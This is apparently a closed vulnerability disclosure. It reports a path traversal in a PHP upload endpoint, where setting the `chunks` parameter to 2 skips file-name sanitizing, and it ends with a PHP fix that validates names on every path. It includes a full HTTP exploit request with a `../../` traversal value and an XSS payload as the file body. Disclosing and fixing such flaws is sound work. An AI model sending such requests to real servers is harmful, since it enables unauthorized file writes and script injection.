Closed
Dear @ignacionelson,
I found a path traversal vulnerability in your application!
Description
Because there is no `if` clause checking the `chunks` parameter when `chunks >= 2`, a user with the Uploader role can set the `chunks` parameter to 2 to bypass the `fileName` sanitizer.

- In Step 1: three parameters that I can control when using the upload function: `chunk`, `chunks`, `fileName`.
- In Step 2: the `if` clause checks whether the `chunks` parameter is `< 2`; only then is the `fileName` parameter handled. So I set `chunks` to 2, which passes Step 2 and goes on to Step 3.

If I don't set a value for `chunk`, the `chunk` parameter defaults to 0, and by setting `chunks` to 2 I can pass this `if`.
Steps To Reproduce
- Use Burp Suite to capture the upload request.
- Change the value of the `chunks` parameter to `2` and add dot-dot segments to the `name` parameter to escape the root directory.
- The file was uploaded into the webroot directory with the name `index.html.part`.
Request:

```http
POST /includes/upload.process.php HTTP/1.1
Host: 172.16.0.12:4444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4677942761162401681381669887
Content-Length: 2817
Origin: http://172.16.0.12:4444
Connection: close
Referer: http://172.16.0.12:4444/upload.php
Cookie: PHPSESSID=7simdbjnrvdjpeq6bkvfukrdvt;

-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="name"

../../csrf.html
-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="chunks"

2
-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<img src=x onerror=alert(1);>
-----------------------------4677942761162401681381669887--
```
Solution:
Add an `if` clause that also checks the case where the `chunks` parameter is `>= 2`, so the file name is sanitized on that path as well.
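One way to implement the fix described above, as an added example that is not the project's code: the file name check runs before the `chunks` branch, so `chunks=2` no longer skips it. The function names `safe_upload_name` and `target_path`, and the use of the system temp directory as the upload directory, are assumptions made for this example.

```php
<?php
// Added example, not the project's code: validate the file name before the
// chunked/non-chunked branch, so a request with chunks=2 cannot skip the check.

function safe_upload_name(string $name): string
{
    // Must be a bare file name: no path separators, no "." or "..", no NUL bytes.
    if ($name === '' || $name === '.' || $name === '..'
        || $name !== basename($name) || strpos($name, "\0") !== false) {
        throw new InvalidArgumentException('Invalid file name');
    }
    // Conservative character set; this also rejects backslashes on Windows.
    if (!preg_match('/^[A-Za-z0-9._-]{1,200}$/', $name)) {
        throw new InvalidArgumentException('Invalid file name');
    }
    return $name;
}

function target_path(string $targetDir, string $name, int $chunks): string
{
    $realDir = realpath($targetDir);
    if ($realDir === false) {
        throw new RuntimeException('Upload directory does not exist');
    }
    // Sanitize for every value of chunks, not only when chunks < 2.
    $path = $realDir . DIRECTORY_SEPARATOR . safe_upload_name($name);
    if ($chunks >= 2) {
        // Partial upload: same validated name with a ".part" suffix.
        $path .= '.part';
    }
    // Belt and braces: the result must still sit directly under the upload dir.
    if (dirname($path) !== $realDir) {
        throw new RuntimeException('Path escapes upload directory');
    }
    return $path;
}

// Constructed input mirroring the report: traversal in "name", chunks set to 2.
try {
    echo target_path(sys_get_temp_dir(), '../../csrf.html', 2), PHP_EOL;
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
// A plain name with chunks=2 yields "<tmpdir>/report.pdf.part" as expected.
echo target_path(sys_get_temp_dir(), 'report.pdf', 2), PHP_EOL;
```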